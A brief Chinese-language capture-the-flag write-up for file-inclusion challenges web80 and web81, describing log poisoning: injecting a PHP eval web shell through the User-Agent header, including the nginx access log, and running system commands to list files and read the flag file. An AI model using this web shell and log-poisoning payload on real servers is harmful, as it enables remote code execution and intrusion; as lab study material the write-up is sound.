2021/7/12

文件包含

web80

image-20210712094647901

data和php协议都不能用了

  • 日志包含

    1
    2
    3
    4
    5
    6
    7
    修改user agent: <?php eval($_POST[1]);?> 执行 

    然后url/?file=/var/log/nginx/access.log

     post data: 1=system("ls"); 查看文件目录 发现flag在fl0g.php里

    最后post data: 1=system("tac fl0g.php");
web81

新增屏蔽:

  • 80方法可用
  • 关于url转码 只有get请求里被php包含才会转码 比如UA头里不转码